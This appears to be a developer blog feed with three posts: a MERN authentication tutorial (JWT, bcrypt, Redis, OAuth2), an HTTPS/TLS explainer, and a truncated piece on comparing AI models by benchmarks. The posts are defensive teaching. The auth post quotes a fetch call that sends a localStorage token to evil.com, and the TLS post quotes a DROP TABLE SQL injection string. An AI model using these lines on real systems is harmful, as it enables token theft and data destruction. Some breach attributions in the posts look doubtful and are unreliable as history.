DEV Community: Shafiq Ur Rehman

Authentication in MERN Apps: JWT, bcrypt, Redis, and OAuth2

Shafiq Ur Rehman — Wed, 22 Apr 2026 00:38:23 +0000

Authentication in MERN Apps: JWT, bcrypt, Redis, and OAuth2

Most web app breaches trace back to one failure: weak authentication. In 2023, the MOVEit Transfer breach exposed 60 million records, partly because session tokens were predictable and revocation was nonexistent. This guide walks you through building auth that holds up in production.

1. Authentication vs. Authorization

Authentication answers one question: Who are you? Authorization answers a different question: what are you allowed to do? They are separate systems that work in sequence.

A user authenticates with an email and password. The server returns a token. That token then determines authorization: which routes the user accesses, which data they read, and which actions they perform.

Definition: Authentication
The process of verifying an identity claim. You say you are user@email.com. The server confirms or denies it.

Definition: Authorization
The process of checking permissions after identity is confirmed. Even a verified user cannot access another user's private data.

Why traditional sessions break at scale

Old-school session auth stores a session ID in a database
Every incoming request triggers a database read to validate that ID
In a single-server setup, this works fine
In a distributed system with five Node.js instances running in parallel, each instance has no idea what sessions the others created

You either run a shared session database (bottleneck), use sticky sessions that route each user to the same server (fragile), or switch to stateless tokens. JWT solves this by encoding identity inside the token itself.

Further reading: OWASP Session Management Cheat Sheet

2. JSON Web Tokens (JWT)

A JWT (JSON Web Token) is a base64url-encoded string with three segments separated by dots.

Header: Declares the signing algorithm (HS256) and token type (JWT)
Payload: Contains claims, which are statements about the user (userId, role, expiry)
Signature: A cryptographic hash that proves the token came from your server

Warning
The payload is base64-encoded, not encrypted. Anyone who intercepts a JWT can decode and read its contents. Never store passwords, credit card numbers, or sensitive personal data in a JWT payload.

The signature is what makes tampering detectable. If an attacker intercepts a token and changes the role from "user" to "admin", the signature no longer matches. The server rejects the request with a 403.

const accessToken = jwt.sign(
  { userId: user._id, role: user.role },
  process.env.ACCESS_TOKEN_SECRET,
  { expiresIn: '15m' }
);

Counter-view: JWTs are stateless by design, which means a validly-issued token cannot be revoked before it expires unless you implement blacklisting (covered in Section 4). Some teams prefer opaque tokens backed by a lookup table specifically to retain control over revocation.

Example: The 2022 Auth0 JWT Confusion Attack

Researchers demonstrated that certain libraries accepted tokens signed with "none" as the algorithm when a server expected HS256. This was a library misconfiguration, not a JWT flaw. The fix: always explicitly reject tokens with an unexpected algorithm in your verification step.

jwt.verify(token, secret, { algorithms: ['HS256'] });

3. Access Tokens vs. Refresh Tokens

Using one long-lived token is dangerous. If it is stolen, the attacker has access for days. The dual-token pattern limits damage by design.

The access token is short-lived (15 minutes) and stored in React state. It is sent with every API request.
The refresh token is long-lived (7 days) and stored in an httpOnly cookie (a browser cookie that JavaScript cannot read, even if an attacker injects malicious scripts). It is sent only when requesting a new access token.

Property	Access Token	Refresh Token
Lifetime	5-30 minutes	7-30 days
Stored in	React state	httpOnly cookie
Sent with	Every API request	Only POST /auth/refresh
Revocable	Hard without blacklist	Easy via Redis delete
If stolen	Usable for 15 min max	Revocable instantly

Why localStorage is never safe for tokens

localStorage is readable by any JavaScript on your page.

Attack flow:
1. Your app loads a third-party analytics script
2. That script's CDN is compromised
3. The injected code runs: fetch('https://evil.com?t=' + localStorage.getItem('token'))
4. The attacker now has your user's token

Tokens in React state (memory) are lost on page refresh, so a refresh token is required to restore the session silently. That is a worthwhile trade for the security gain.

Example: British Airways Breach (2018)

Attackers injected 22 lines of JavaScript into British Airways' checkout page. The script read form fields and sent them to a malicious server. Any access tokens in localStorage would have been equally exposed. Storing tokens in memory does not prevent form scraping, but it does prevent token theft via XSS (Cross-Site Scripting, where attackers inject malicious code into your pages).

Further reading: OWASP XSS Prevention Cheat Sheet

4. The Complete Auth Flow

The full auth flow runs in five steps:

Login: React sends { email, password } to POST /auth/login
Token issuance: The server verifies credentials, generates both tokens, stores the refresh token in Redis, sets the refresh token in an httpOnly cookie, and returns the access token in the response body
API requests: React attaches Authorization: Bearer <accessToken> to every protected request
Silent refresh: When an API call returns 403 (token expired), an Axios interceptor calls POST /auth/refresh. The browser sends the httpOnly cookie automatically. The server issues a new access token. The interceptor retries the original request. The user sees nothing.
Logout: The server deletes the refresh token from Redis and clears the cookie. React clears its state.

// Axios interceptor for silent refresh
api.interceptors.response.use(
  (res) => res,
  async (err) => {
    const original = err.config;
    if (err.response?.status === 403 && !original._retry) {
      original._retry = true;
      const res = await axios.post('/api/auth/refresh', {}, { withCredentials: true });
      setAccessToken(res.data.accessToken);
      original.headers.Authorization = `Bearer ${res.data.accessToken}`;
      return api(original);
    }
    return Promise.reject(err);
  }
);

Warning
Never pass the refresh token manually in request bodies. The httpOnly cookie travels automatically. Passing it in a body or header exposes it to JavaScript and defeats its purpose.

Example: Token Rotation at Spotify

Spotify's mobile apps use a variation of this pattern. The app holds a short-lived access token in memory. When it expires mid-playback, a background refresh happens without interrupting the user's listening session. The user never sees a login screen unless the refresh token itself expires or is revoked.

Further reading: RFC 6749 - The OAuth 2.0 Authorization Framework

5. Password Hashing with bcrypt

Storing plain-text passwords guarantees that a database breach becomes a full account takeover across every platform where your users reuse that password. Studies show 60-65% of users reuse passwords across multiple sites.

bcrypt solves this with three properties:

Irreversible: You cannot reverse a bcrypt hash back to the original password
Salted: A random string (called a salt) is added before hashing, so two identical passwords produce different hashes. This defeats rainbow tables (precomputed databases of common password hashes used by attackers).
Slow: bcrypt applies its function 2^n times, making brute-force attacks (trying millions of guesses) computationally expensive

const saltRounds = 12;
const passwordHash = await bcrypt.hash(password, saltRounds);

// On login:
const isValid = await bcrypt.compare(password, user.passwordHash);

saltRounds performance trade-off

saltRounds	Time per hash	Attacker guesses/second
8	~1ms	~1,000
10	~10ms	~100
12 (recommended)	~40ms	~25
14	~160ms	~6

40ms per login is undetectable to your users. For an attacker trying millions of guesses, 25 attempts per second per machine is a serious obstacle.

Counter-view: Very high saltRounds values (14+) add noticeable latency on high-traffic login endpoints. Some teams run bcrypt on a dedicated worker thread pool to avoid blocking the Node.js event loop during peak load.

Example: LinkedIn 2012 Breach

LinkedIn stored 6.5 million passwords with SHA-1 (fast, unsalted). Within days, the majority were cracked from public rainbow tables. A 2016 follow-up revealed the actual breach was 117 million accounts. bcrypt with salting would have made bulk cracking impractical.

Further reading: OWASP Password Storage Cheat Sheet

6. Redis for Token Management

Redis is an in-memory key-value store (it holds data in RAM, not on disk). For auth operations that run on every request, this speed difference matters significantly.

Redis handles three auth tasks well:

Refresh token storage: Store the token with a 7-day TTL (Time To Live, meaning Redis deletes it automatically when it expires). On logout, delete it immediately to invalidate the session.
JWT blacklisting: JWTs are stateless and cannot be revoked by default. Add a jti (JWT ID) claim to each token. On forced logout, store the jti in Redis with a TTL matching the token's expiry. Check the blacklist in your middleware.
Rate limiting login attempts: Track failed login attempts per IP address. After 10 attempts in 15 minutes, return 429 (Too Many Requests). Redis's atomic INCR command handles concurrent requests without race conditions (situations where two processes interfere with each other's data).

const rateLimit = async (req, res, next) => {
  const key = `ratelimit:${req.ip}`;
  const attempts = await client.incr(key);
  if (attempts === 1) await client.expire(key, 900);
  if (attempts > 10) {
    const ttl = await client.ttl(key);
    return res.status(429).json({ message: `Try again in ${ttl} seconds.` });
  }
  next();
};

Warning
Redis data lives in memory. If your Redis instance restarts without persistence configured, you lose all stored refresh tokens. Enable Redis persistence (appendonly yes) or use a managed Redis service (Redis Cloud, AWS ElastiCache) for production deployments.

Pros and Cons of Redis-based Auth

Pros	Cons
Sub-millisecond lookup speed	Additional infrastructure to maintain
Built-in TTL for auto-expiry	Memory costs money at scale
Atomic operations prevent race conditions	Data lost on restart without persistence
Instant token revocation	Adds latency if Redis is on a remote host
Scales horizontally with Redis Cluster	Operational complexity vs. database-only approach

Example: Ride-sharing Forced Logout

When Uber or Lyft detects a compromised account, their systems need to log the user out across all active devices immediately, including app sessions in progress. Redis-backed refresh token storage makes this possible: one DEL command per user ID invalidates all sessions. A database-only approach requires the same operation at 10-20x higher latency.

Further reading: Redis Documentation - Data Persistence

7. Google OAuth2 Integration

OAuth2 is an authorization protocol (a standard way for services to share access without sharing passwords). When a user clicks "Sign in with Google," your server never sees their Google password. Google authenticates the user and gives your server a profile.

Definition: OAuth2
A protocol that allows one service to grant another service limited access to a user's account without sharing credentials. Your MERN app asks Google: "Is this user who they say they are?" Google confirms and hands you the profile.

The flow:

User clicks "Sign in with Google."
Browser redirects to Google's consent page
User approves
Google redirects to your callback URL with an authorization code
Your server exchanges the code for a user profile via Google's API
Your server finds or creates the user in MongoDB
Your server issues your own JWT tokens and redirects the user to the frontend

passport.use(new GoogleStrategy({
  clientID: process.env.GOOGLE_CLIENT_ID,
  clientSecret: process.env.GOOGLE_CLIENT_SECRET,
  callbackURL: '/api/auth/google/callback'
}, async (accessToken, refreshToken, profile, done) => {
  let user = await User.findOne({ googleId: profile.id });
  if (!user) {
    user = await User.create({
      googleId: profile.id,
      email: profile.emails[0].value,
      name: profile.displayName
    });
  }
  return done(null, user);
}));

Counter-view: OAuth2 introduces a dependency on Google's uptime. In March 2024, a Google OAuth outage blocked users from logging into thousands of third-party apps that had no fallback auth method. Always maintain a password-based login option alongside OAuth2.

Warning
When redirecting the access token to your React frontend via URL query parameters (/oauth-callback?token=...), remove the token from the URL immediately using window.history.replaceState. URL parameters appear in browser history, server logs, and referrer headers.

Example: "Sign in with Google" at Notion

Notion uses Google OAuth2 as its primary login method for workspace users. When Google issues a profile, Notion creates a workspace account tied to the Google ID. If the user later changes their Google password, Notion's auth is unaffected because Notion stores its own JWT tokens.

Further reading: Google OAuth2 Documentation

8. Security Checklist

These are non-negotiable requirements for production auth:

Set httpOnly: true on the refresh token cookie to prevent XSS token theft
Set secure: true so the cookie only travels over HTTPS
Set sameSite: 'strict' to block CSRF attacks (Cross-Site Request Forgery, where an attacker on a different domain triggers requests that carry your user's cookie)
Store access tokens in React state, never in localStorage or sessionStorage
Keep access token lifetime at 15 minutes or less
Use bcrypt with saltRounds: 12 for all password hashing
Store refresh tokens in Redis with a matching TTL for instant revocation on logout
Add a jti claim to access tokens and implement a Redis blacklist for forced logout scenarios
Rate-limit login endpoints to prevent brute-force attacks
Generate secrets with a cryptographically secure random source (32+ characters)

Warning
Never commit .env files to version control. Use environment variable injection via your deployment platform (Vercel, Railway, AWS Secrets Manager). Rotate your JWT secrets immediately if they are ever exposed.

Example: Okta 2022 Supply Chain Attack

A breach at Okta's support vendor exposed customer session tokens. Okta's short-lived token lifetimes limited the attacker's window. Companies with longer-lived tokens (24h+) had a much larger exposure window. This incident confirmed that short access token lifetimes are not theoretical security hygiene but practical damage control.

Further reading: OWASP Authentication Cheat Sheet

9. Common Interview Questions

These questions appear in frontend, backend, and fullstack interviews at senior levels.

Q: What happens if an access token is stolen from memory?

The 15-minute expiry limits the damage window. Add audience and issuer claims to bind tokens to your specific API. For high-security systems, embed the client's IP in the token payload and reject requests from mismatched IPs. Token rotation (issue a new access token on every refresh) also invalidates stolen tokens as soon as the legitimate session refreshes.

Q: How do you log a user out of all devices?

Store each refresh token with a device-scoped key in Redis (refresh:{userId}:{deviceId}). To log out everywhere, scan and delete all keys matching refresh:{userId}:*. This invalidates every active session immediately.

Q: What is the difference between OAuth2 and JWT?

They solve different problems. OAuth2 is a protocol for delegating access between services. JWT is a token format for encoding signed data. OAuth2 uses JWTs as its token format, but the two are independent. You use JWT-based auth with no OAuth2 at all, as in a standard username/password system.

Q: What is a timing attack, and how does bcrypt prevent it?

A naive string comparison returns early when two strings differ at the first character, leaking information about correct values through response time. bcrypt.compare() uses constant-time comparison: it always takes the same amount of time regardless of where the strings differ, making timing-based inference impossible.

Further reading: OWASP Cheat Sheet Series Index

HTTP vs HTTPS: One Letter Between You and a Hacker's Best Day

Shafiq Ur Rehman — Tue, 21 Apr 2026 19:13:19 +0000

HTTP sends your passwords in plain text. HTTPS stops that. But understanding why every mechanism in HTTPS exists makes you a sharper engineer and a better security thinker. This article breaks down the full picture, starting from what breaks without protection and working up through each fix.

1. What HTTP Actually Does (And Why That Is a Problem)

HTTP (HyperText Transfer Protocol) sends every request and response as raw, readable text. Every router, ISP node, and transit server between your device and the destination sees the full content of every request, including passwords, session tokens, and personal data.

This is not a flaw that crept in through negligence. The protocol was designed in 1991 for an academic network where trust was assumed. The internet grew into banking, healthcare, and global commerce without updating that foundational assumption.

TCP/IP, the delivery system beneath HTTP, moves packets between machines. It was never designed to hide what is inside them from the machines doing the routing.

Warning: On public Wi-Fi, every device on the same network running HTTP traffic can read your data with freely available tools. HTTPS is the minimum bar for any site that handles user input.

Key problems with plain HTTP:

Credentials sent as readable text across every network hop
Session tokens visible to anyone on the same network
No way to confirm the server you reached is the server you intended to reach
No detection of content modification in transit

Real-world case: In 2010, a Firefox extension called Firesheep was released publicly. It automated the capture of unencrypted session cookies on shared Wi-Fi networks. Anyone on the same coffee shop network could hijack Facebook, Twitter, and Flickr sessions with a single click. This forced major platforms to adopt HTTPS for all traffic, not just login pages.

[Further reading: RFC 7230 - HTTP/1.1 Message Syntax and Routing]

Background: What Is TCP/IP?

TCP/IP is the foundational communication standard of the Internet. TCP (Transmission Control Protocol) splits your data into packets and ensures they arrive correctly. IP (Internet Protocol) addresses and routes those packets across networks. Together, they form the postal system of the internet. They deliver packets reliably, but they do not encrypt or authenticate what is inside those packets.

2. The Key Distribution Problem

Symmetric encryption (like AES-256) is fast and computationally strong. Both sides encrypt and decrypt using the same key. The problem: both sides must already share that key before the encrypted conversation starts.

The core paradox: To share the key securely, you need a secure channel. To have a secure channel, you need the key. You cannot solve one without the other.

If you send the key over the same network you want to protect, an attacker intercepting the key can decrypt every message that follows. You have added encryption without adding security.

This problem blocked practical, secure internet communication for decades. It was not solved until public-key cryptography became viable.

Note: This is called the key distribution problem, and it is one of the most consequential unsolved problems in cryptography before the 1970s. The Diffie-Hellman key exchange (1976) was the first published solution. RSA followed in 1977.

Counter-view: Some argue that pre-shared keys work fine in closed systems, such as military or enterprise networks, where physical key distribution is possible. They are right. The key distribution problem is specifically a problem for open, anonymous communication across untrusted networks, which is what the public internet requires.

[Further reading: Diffie, W. and Hellman, M. - New Directions in Cryptography (1976)]

3. Asymmetric Encryption: How the Key Exchange Problem Gets Solved

Asymmetric encryption uses two mathematically linked keys. What the public key encrypts, only the private key can decrypt. The public key is shared openly. The private key never leaves the server.

How this solves the distribution problem:

The client gets the server's public key (sent openly; anyone can see it)
The client encrypts a secret value with that public key
Only the server holding the private key can decrypt it
Both sides now share a secret that never crossed the network in usable form

Why not use asymmetric encryption for all traffic?

RSA encryption is roughly 1,000 times slower than AES. Encrypting a video stream or a large API response with RSA would make the web unusable. TLS uses a hybrid model:

Asymmetric encryption handles the key exchange (one time per session)
Symmetric AES uses the resulting session key for all actual data transfer

ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) is the modern replacement for RSA in key exchange. It produces the same security with smaller key sizes and faster computation. The "Ephemeral" part means the keys are one-time-use and discarded after each session, which is critical to Perfect Forward Secrecy (covered in section 7).

Real-world case: In 2017, researchers demonstrated that RSA-1024 keys (once considered adequate) could be factored in practical time using modern hardware clusters. This accelerated the industry-wide shift to ECDHE, which offers equivalent security with 256-bit keys compared to RSA's 2048-bit minimum.

[Further reading: NIST SP 800-56A Rev.3 - Elliptic Curve Key Establishment Schemes]

Background: What Is a Session Key?

A session key is a temporary symmetric key generated fresh for each connection. It exists only for the duration of one TLS session. After the session ends, the key is discarded. All the actual web traffic during that session is encrypted and decrypted using this key. Because it is symmetric, encryption and decryption are fast.

4. The TLS Handshake: Four Phases, Four Problems Solved

Each phase of the TLS handshake solves a specific attack. Skipping any one phase opens a specific class of vulnerability.

Phase 1: Capability Negotiation

The client sends supported TLS versions and cipher suites, plus a random value (nonce). Without this phase, an attacker positioned between client and server could strip the negotiation and force both sides to use an older, weaker TLS version. This is called a downgrade attack. The nonce prevents replay attacks, where a recorded handshake is played back to establish a fraudulent session.

Phase 2: Identity Assertion

The server sends its certificate. The certificate contains the server's public key, its domain name, and a digital signature from a Certificate Authority (a trusted third party that verifies domain ownership). Without this phase, the client has no way to confirm it is talking to the intended server. Encrypting traffic to an impostor is functionally the same as sending it in plaintext.

Phase 3: Key Exchange

Both sides run the ECDHE algorithm using their respective key material to independently derive the same session key. The session key never travels across the network. An attacker watching the exchange sees only public parameters, from which deriving the private session key is computationally infeasible.

Phase 4: Transcript Verification

Both sides hash the complete record of every handshake message and compare the results. If any message was altered or injected mid-handshake, the hashes will not match, and the connection terminates immediately. This phase confirms that the negotiation itself was not tampered with.

Warning: TLS 1.0 and 1.1 are deprecated and should be disabled on all servers. They lack protection against attacks like BEAST and POODLE. TLS 1.3, standardized in 2018, is the current secure baseline. It removed all cipher suites that do not provide Perfect Forward Secrecy.

Real-world case: In 2014, the POODLE attack (Padding Oracle On Downgraded Legacy Encryption) demonstrated that an active attacker could force a TLS 1.2 connection to downgrade to SSL 3.0, then exploit a padding oracle vulnerability to decrypt session cookies. The attack required control of the network between client and server, a realistic position for an attacker on shared Wi-Fi.

[Further reading: RFC 8446 - The Transport Layer Security (TLS) Protocol Version 1.3]

Pros and Cons of TLS Overhead

Aspect	Benefit	Cost
Encryption	Prevents eavesdropping on all traffic	Marginal CPU overhead per connection
Handshake	Establishes authenticated, shared key	Adds 1-2 round trips on first connection
Certificate validation	Confirms server identity	Requires OCSP or CRL check for revocation status
TLS 1.3 0-RTT	Allows resuming sessions with zero round trips	Replay attacks possible on non-idempotent requests
PFS (ECDHE)	Past sessions stay secure after key compromise	Slightly more computation than static RSA
Certificate expiration	Limits damage from key theft	Requires automated renewal management

5. Certificates and Certificate Authorities: The Trust Problem

Without certificates, encryption protects the channel but not the identity at the other end. An attacker positioned between you and your bank can establish two encrypted connections: one with you and one with the real bank. They decrypt, read, and re-encrypt everything. From your perspective, the connection looks secure. You are just talking to the wrong party.

A TLS certificate solves this by binding a server's public key to its domain name, with a Certificate Authority (CA) signature as proof.

What a CA actually does:

When you request a certificate for bank.com, the CA independently verifies that you control that domain (through DNS records, HTTP challenges, or email verification). It then signs the certificate with its own private key. Every major OS and browser ships with a pre-installed list of trusted CA public keys.

When your browser connects to bank.com, it checks whether the certificate's CA signature is valid against a trusted CA it already knows. If an attacker substitutes their own public key, the CA signature fails validation, and the browser refuses the connection.

Counter-view: The CA model concentrates trust in a relatively small number of organizations. In 2011, Dutch CA DigiNotar was compromised, and attackers issued fraudulent certificates for google.com, mozilla.com, and other high-value domains. Iranian users' traffic was intercepted using these certificates. The entire DigiNotar CA was subsequently removed from trust lists. This event demonstrated that the CA model's weakest point is not the cryptography; it is the security of the CA organizations themselves.

Real-world case: Certificate Transparency (CT) logs were introduced in 2013 and became mandatory for Chrome in 2018. Every certificate issued by any CA must be logged publicly in append-only CT logs. This means fraudulent certificate issuance becomes detectable, because the certificate will appear in a public log even if the intended domain owner was not notified.

[Further reading: RFC 9162 - Certificate Transparency Version 2.0]

Background: What Is SHA-256?

SHA-256 is a hashing algorithm. You feed it any input (a document, a certificate, a password) and it produces a fixed 256-bit fingerprint. Two different inputs rarely produce the same fingerprint (this is called a collision). You cannot reverse a SHA-256 hash to recover the original input. CAs sign the SHA-256 hash of a certificate rather than the certificate itself, because RSA has size limits and because a hash collision would allow attaching a legitimate signature to a fraudulent certificate.

6. Perfect Forward Secrecy: Protecting Past Sessions

Before Perfect Forward Secrecy became standard, session keys were mathematically derived from the server's long-term private key. This created a retroactive vulnerability.

The "record now, decrypt later" attack:

An attacker records all encrypted traffic between users and a server today
Five years later, the attacker obtains the server's private key (through a breach, a legal order, or social engineering)
The attacker can now decrypt every session ever recorded, retroactively

ECDHE defeats this by generating fresh, independent key pairs for every session. The session key derives from these ephemeral keys, not from the server's long-term key. When the session ends, the ephemeral keys are permanently destroyed. An attacker holding the server's private key gains nothing from it for past sessions.

TLS 1.3 made PFS mandatory. Every cipher suite in TLS 1.3 requires ephemeral key exchange. All static RSA key exchange cipher suites were removed.

Warning: TLS configurations that still allow cipher suites like TLS_RSA_WITH_AES_256_CBC_SHA have no Perfect Forward Secrecy. Audit your server's TLS configuration regularly. Tools like SSL Labs' server test (ssllabs.com/ssltest) check for this explicitly.

Real-world case: The Snowden documents (2013) revealed that intelligence agencies were storing large volumes of encrypted internet traffic. The stated rationale was that future advances in cryptanalysis or access to private keys could make currently unreadable traffic readable later. PFS directly limits the value of bulk collection by ensuring that traffic encrypted with ephemeral keys cannot be retroactively decrypted.

[Further reading: RFC 7457 - Summarizing Known Attacks on TLS and DTLS]

7. What HTTPS Does Not Protect: The Application Layer

TLS secures the transport pipe between the browser and the server. It does not inspect the payload flowing through that pipe. A SQL injection string arrives at your database:

Encrypted in transit (TLS did its job)
Intact and unmodified (no tampering occurred)
Fully executable (TLS never looked at the content)

The payload '; DROP TABLE users; -- is delivered correctly. What your application does with it is entirely outside TLS's scope.

Threats outside TLS's responsibility:

SQL Injection: Malicious database commands embedded in user input, executed when the application fails to sanitize them
XSS (Cross-Site Scripting): Malicious scripts injected into web pages, executed in other users' browsers
CSRF (Cross-Site Request Forgery): Tricks authenticated users into submitting requests they did not intend to make
Authentication bypass: Logic flaws in how the server verifies identity, unrelated to encryption
DDoS at the application layer: Floods of legitimate-looking HTTPS requests that exhaust server resources

Real-world case: The 2012 LinkedIn breach exposed 6.5 million password hashes. The passwords were hashed without salt using SHA-1, making the majority crackable within hours using rainbow tables. The site used HTTPS. The encryption protected traffic in transit; it had no bearing on how the server stored passwords internally.

Warning: Deploying HTTPS and considering security "complete" is one of the most common and costly security misconceptions in web development. HTTPS handles one threat model. Your application, database, authentication system, and infrastructure each have separate attack surfaces that require separate controls.

Defense layers beyond HTTPS:

Input validation and parameterized queries protect against SQL injection and XSS
CSRF tokens protect against cross-origin request forgery
WAF (Web Application Firewall) filters malicious patterns at the application boundary
IAM and MFA control who can authenticate and what they can access
DNSSEC and HSTS prevent DNS poisoning and protocol downgrade before TLS starts
Logging and monitoring detect what all other layers missed

[Further reading: OWASP Top Ten - owasp.org/www-project-top-ten]

8. SSH on AWS EC2: Same Cryptography, Different Trust Model

SSH connections to AWS EC2 instances use the same asymmetric cryptography as HTTPS: key pairs, encryption, and integrity checks. But the trust model is completely different.

How EC2 SSH works:

AWS generates a key pair when you create the instance
You receive the private key file (.pem) once, at creation time
The public key is placed in the instance's ~/.ssh/authorized_keys file
On connection, the client proves possession of the private key through a cryptographic challenge

No CA is involved. Trust comes from directly holding the key. You control both sides of the connection.

TOFU (Trust On First Use):

On the first SSH connection to an EC2 instance, your terminal displays the server's fingerprint (a hash of the host's public key) and asks you to verify it. You confirm manually. The fingerprint is cached locally. Future connections verify automatically against the cached value.

Why HTTPS cannot use TOFU:

A developer logs into perhaps five EC2 instances. Manual fingerprint verification per connection is practical. A browser user visits millions of different websites over the years of browsing. Manually verifying every server's fingerprint on the first visit is not operationally possible. The CA model automates the trust establishment that TOFU requires you to perform by hand.

Note: When you see the SSH warning "Host key verification failed," this means the server's fingerprint changed since your last connection. This is normal after rebuilding an EC2 instance, but on a server you have not touched recently, it warrants investigation. It could indicate an MITM attack.

Real-world case: In misconfigured automated deployment pipelines, StrictHostKeyChecking=no is sometimes set to prevent SSH from prompting on first connection. This disables TOFU entirely and accepts any host key, including a forged one. In 2020, several CI/CD pipeline security audits found this configuration common in enterprise environments, leaving deployments vulnerable to supply chain attacks.

[Further reading: OpenSSH Manual - ssh_config(5)]

Summary: Each Mechanism and the Attack It Prevents

Mechanism	Attack prevented	Removed if missing
Encryption in transit	Eavesdropping at any network hop	Credentials, tokens, and data visible to all intermediaries
Asymmetric key exchange (ECDHE)	Key interception during setup	Symmetric key useless to share over the channel, it must be secured
TLS certificates	MITM via impostor public key	Encrypted tunnel to the wrong party
Certificate Authorities	Self-signed certificate fraud	No scalable way to verify domain ownership
SHA-256 in certificate chains	Certificate forgery via hash collision	Valid CA signatures attachable to fraudulent certificates
Phased TLS handshake	Downgrade attacks, injected messages	Each phase depends on guarantees from the previous one
Perfect Forward Secrecy	Record-now, decrypt-later attacks	Long-term key compromise exposes all past sessions
Certificate expiration	Indefinite use of a stolen private key	One stolen key grants permanent impersonation
Application layer controls	SQL injection, XSS, CSRF, auth bypass	TLS secures the pipe but never inspects what flows through it

HTTPS is the first defense, not the only one. Every layer listed above addresses a different attacker capability. Remove any one layer, and a specific class of attack becomes practical. That is why the architecture is built the way it is, and why "we have HTTPS" is the start of a security conversation, not the end of one.

[Further reading: OWASP Web Security Testing Guide - owasp.org/www-project-web-security-testing-guide]

How to Choose the Right AI Model for the Right Job

Shafiq Ur Rehman — Tue, 21 Apr 2026 12:51:54 +0000

There are 480+ language models tracked on ArtificialAnalysis.ai right now. Each one claims to be the best, fastest, or most affordable. Most of that is marketing. What you need is data.

ArtificialAnalysis.ai is one of the few platforms that evaluates AI models independently. No vendor pays to appear on their leaderboards. They run the tests themselves, using their own methodology, and publish the results for everyone. That independence is what makes the data worth trusting.

This article walks you through what the data actually shows, and gives you a framework for picking the right model for your specific task.

1. What ArtificialAnalysis.ai Does, and Why It Matters

Background: Most AI benchmarks are published by the companies that build the models. That creates an obvious conflict of interest. ArtificialAnalysis.ai re-runs evaluations independently, using standardized tests, so you can compare models across providers on equal terms.

The platform tracks three core dimensions for every model:

Intelligence: how well the model performs across diverse reasoning, knowledge, and coding tasks
Speed: output tokens per second, which determines how fast responses appear
Price: USD per one million tokens, which determines what it costs to run at scale

It also maintains separate leaderboards for image and video generation, which operate on completely different criteria from text intelligence.

The composite intelligence score is called the Artificial Analysis Intelligence Index v4.0. It combines ten independent sub-evaluations into a single number. That number is useful for quick comparisons. The sub-benchmark breakdowns are useful for task-specific decisions.

2. The Six Benchmarks That Predict Real Performance

The image above lists the six benchmark categories used to evaluate frontier models, along with what each one tests and why it is harder than standard benchmarks.

Most AI benchmarks are too easy now. Frontier models score near-perfect on them, which makes it impossible to differentiate between the top options. ArtificialAnalysis.ai focuses on six that still produce meaningful separation.

GPQA: PhD-Level Science Knowledge

GPQA contains 448 expert-level science questions across biology, chemistry, and physics. Non-PhD humans score only 34% on this test, even with full internet access. That benchmark tells you something important: a model scoring well on GPQA has internalized knowledge at a depth that goes beyond what most humans retrieve through search.

What this predicts in practice: the model's usefulness for research assistance, scientific writing, and technical analysis in specialized domains.

Example: A biotech team using AI for drug interaction literature review needs strong GPQA performance. A model scoring 60%+ will give substantially more accurate responses than one scoring 40%, not marginally better ones.

MMLU-Pro: Language Comprehension Under Pressure

MMLU-Pro is a harder version of the Massive Multitask Language Understanding benchmark. The original gave four answer choices. This version gives ten. More choices reduce lucky guessing and produce a cleaner signal of actual comprehension.

Background: MMLU was one of the first large-scale tests used to evaluate language models across academic subjects. The Pro version removes easier questions and expands choices to make the test more discriminating.

Example: If you are deploying a model for customer support in legal or financial services, MMLU-Pro scores are a strong indicator of whether the model will handle ambiguous, nuanced language correctly.

AIME: Multi-Step Mathematics

AIME stands for the American Invitational Mathematics Examination, an invite-only national competition for top high school students. The problems require multi-step logical reasoning, symbolic manipulation, and the ability to hold a complex problem state across many steps.

Warning: Strong AIME scores do not guarantee accuracy on all math tasks. Models that score well here sometimes still make arithmetic errors in basic financial calculations. Always test on your specific math use case before committing.

Example: Quantitative finance teams evaluating models for strategy analysis should weight AIME scores heavily. A model that fails at this level will struggle with multi-step financial modeling chains.

LiveCodeBench: Real Coding Ability

LiveCodeBench pulls problems from ongoing competitive programming contests on LeetCode, AtCoder, and Codeforces. Because the problems come from live contests, they are unlikely to appear in any model's training data. The model has to actually solve them.

Background: "Data contamination" is a known issue in AI benchmarking. If a model was trained on the answers to benchmark questions, it scores high without actually learning anything new. Live benchmarks reduce this risk significantly.

Example: A software engineering team choosing a code assistant should prioritize LiveCodeBench scores over general intelligence scores. The correlation to production code quality is more direct.

MuSR: Sustained Logical Reasoning

MuSR tests long-form logical deduction. A typical problem involves reading a 1,000-word narrative and answering who has means, motive, and opportunity. It measures whether a model tracks multiple facts, relationships, and constraints across a long context without losing thread.

Example: Legal document analysis, contract review, and compliance checking all require this. A model that loses track of earlier clauses in a 40-page contract will produce unreliable summaries, even if its general intelligence score looks strong.

HLE: Humanity's Last Exam

HLE contains 2,500 of the hardest, most subject-diverse, multi-modal questions assembled for AI evaluation. It is designed to be the final academic test before AI performance exceeds what humans reliably achieve.

Warning: HLE scores are low even for the best models. Do not penalize a model for a low absolute score. Look at relative performance between models, not absolute numbers.

Example: Research institutions working on frontier science questions should monitor HLE scores closely. This benchmark is the best current proxy for whether a model can contribute to genuinely novel work.

3. The Intelligence Leaderboard: Who Leads and by How Much

The image above shows the top models ranked across three separate dimensions. Notice that the ranking order changes substantially depending on which dimension you are looking at.

[IMAGE PLACEHOLDER: Image 3, the full Artificial Analysis Intelligence Index bar chart with 28 models]

This chart shows 28 of the 480 tracked models, ranked by composite Intelligence Index score. The top three models, from three different companies, are tied at 57.

Current top intelligence rankings as of April 2026:

Rank	Model	Score	Provider
1 (tied)	Claude Opus 4.7 (max)	57	Anthropic
1 (tied)	Gemini 3.1 Pro Preview	57	Google
1 (tied)	GPT-5.4 (xhigh)	57	OpenAI
4	Kimi K2.6	54	Kimi
5	Claude Opus 4.6 (max)	53	Anthropic
6	Muse Spark	52	Meta
7 (tied)	Qwen3.6 Max Preview	52	Alibaba
7 (tied)	Claude Sonnet 4.6 (max)	52	Anthropic
9	GLM-5.1	51	Zhipu

The three-way tie at the top is significant. Anthropic, Google, and OpenAI are operating at the same frontier capability level. No single provider has a clear intelligence advantage right now.

Where this gets more interesting is at the sub-benchmark level. A model ranked 4th overall might outperform the top three on a specific task category like coding or long-context retrieval. The composite score is a useful filter; the sub-scores are where you make the actual decision.

4. Intelligence vs. Cost: Finding Your Operating Point

The image above maps Intelligence Index score on the vertical axis against Cost to Run on the horizontal axis, displayed on a log scale in USD. The green-shaded area in the top-left is labeled "Most Attractive Quadrant," representing models that score high on intelligence while remaining affordable.

